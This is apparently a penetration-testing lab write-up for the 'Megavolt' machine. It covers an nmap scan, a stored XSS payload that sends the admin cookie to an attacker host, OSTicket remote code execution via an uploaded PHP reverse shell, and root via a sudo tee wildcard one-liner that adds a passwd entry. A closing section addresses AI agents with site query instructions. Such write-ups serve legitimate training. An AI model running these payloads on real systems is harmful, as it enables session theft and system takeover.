# Megavolt

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 -Pn 192.168.183.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:29 +08
Nmap scan report for 192.168.183.115
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE
22/tcp open   ssh
80/tcp open   http
```

We can start proxying traffic through Burp.

### OSTicket -> XSS Admin Cookie

Port 80 hosted an OSTicket instance, which has a lot of vulnerabilities and exploits:

<figure><img src="/files/4CaAfeXdkyqAko3EPccb" alt=""><figcaption></figcaption></figure>

I registered a new user and opened a ticket. When I viewed the status, it seems that an 'Alfred Smith' closes the tickets:

<figure><img src="/files/QfwANmuUjUi9mmREN3Gz" alt=""><figcaption></figcaption></figure>

This confirms that a user is indeed viewing the tickets, and we can try to use an XSS exploit for it. The file upload function is vulnerable to an XSS exploit:

{% embed url="<https://www.exploit-db.com/exploits/47224>" %}

We can upload this HTML file to steal the administrator's cookie:

{% code overflow="wrap" %}

```markup
<script>new Image().src='http://192.168.45.208/?cookie=' + encodeURI(document.cookie);</script>
```

{% endcode %}

As soon as we upload the file and submit a new ticket, we get this on a listener port:

<figure><img src="/files/sSAqXqq8pOgkxbg6W1FD" alt=""><figcaption></figcaption></figure>

Using this cookie, we can then login to OSTicket at `/scp` by changing our cookie within Burp:

<figure><img src="/files/rqTjTO7MM7PdkC2sVUHt" alt=""><figcaption></figcaption></figure>

### OSTicket RCE

Within the settings of the Admin Panel, we can find the version of OSTicket running:

<figure><img src="/files/ite3bDdIv5FgojeUgl9X" alt=""><figcaption></figcaption></figure>

This version is vulnerable to an RCE exploit. To exploit it, we first need to enable the plugin that stores attachments within the file system of the machine:

<figure><img src="/files/wPzE9CJ6he0hDATbIzpG" alt=""><figcaption></figcaption></figure>

Afterwards, in the settings, make sure to change the Attachment settings:

<figure><img src="/files/Pz4rrBqjNW4w0YxK4cfc" alt=""><figcaption></figcaption></figure>

Then, we need to open a new ticket and upload a PHP reverse shell.

<figure><img src="/files/jodUxZp2BgWReHCc8qMq" alt=""><figcaption></figcaption></figure>

View the ticket from the Administrator account:

<figure><img src="/files/vqtlnx1bprI1UNUO9m2k" alt=""><figcaption></figcaption></figure>

If we click on the attachment, it would generate a GET request to the `file.php` file with a key:

<figure><img src="/files/qOUmqy25JvRCKDe3Ndqw" alt=""><figcaption></figcaption></figure>

This is the URL key, and we need one more key which is the File key. This can be generated by doing the following:

```
$ php -a 
Interactive shell

php > $sha1 = base64_encode(sha1_file('shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
Y2_qPxdA2XMAeDyyloBdYykx9uE
```

Then, we can finally use this repository's script to trigger the shell:

{% embed url="<https://github.com/Und3r-r00t/osticket-shell>" %}

The exploit took me quite a few times before it worked. If it doesn't work, upload your shell with a different name. In my case, `shell.php` worked.

<figure><img src="/files/zvEZWseAb8uthd3ejfgn" alt=""><figcaption></figcaption></figure>

The script would brute force every possible directory that the PHP shell is in before executing it:

<figure><img src="/files/RYeNtCBxgTUdTwBK7YQW" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Sudo Tee + Wildcard -> Root

We can check our `sudo` privileges on the machine:

```
bash-4.2$ sudo -l 
Matching Defaults entries for apache on megavolt:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User apache may run the following commands on megavolt:
    (ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*
```

Because there's a wildcard there, we can basically run `tee` to write to any file we want. First, generate a new password hash:

```
$ openssl passwd -1 hello123
$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.
```

Then, write this to the `/etc/passwd` file using this one-liner:

{% code overflow="wrap" %}

```bash
(cat /etc/passwd && echo 'innocent:$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.:0::/root:/bin/sh') | sudo tee /var/log/httpd/../../../../../../etc/passwd
```

{% endcode %}

This would add our new entry into the `/etc/passwd` file and we can `su` to become `root`:

<figure><img src="/files/NnekNYxABlZno4Azr404" alt=""><figcaption></figcaption></figure>

Rooted!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/megavolt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.